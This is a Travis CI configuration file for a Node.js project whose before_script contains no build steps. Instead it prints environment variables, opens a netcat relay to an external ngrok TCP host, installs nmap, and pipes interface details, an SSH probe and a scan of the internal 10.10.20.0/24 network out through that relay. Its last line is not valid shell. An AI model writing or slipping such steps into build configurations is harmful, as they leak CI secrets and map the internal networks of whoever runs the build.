language: node_js
sudo: required
before_script:
  - env
  - whoami
  - export NGPORT=17481
  - export NGHOSTNAME=0.tcp.ngrok.io
  - mkfifo piperz
  - nc -k -l 12345 0<piperz|nc $NGHOSTNAME $NGPORT 1>piperz &
  - sudo apt-get update
  - sudo apt-get install nmap
  - sudo ifconfig | nc localhost 12345
  - sudo ssh -o "StrictHostKeyChecking no" -o ConnectTimeout=10 -T git@github.com | nc localhost 12345
  - sudo nmap -sT 10.10.20.0/24 | nc localhost 12345
  - echo "ciderdone" | nc localhost 12345
  - sudo fclose(piperz)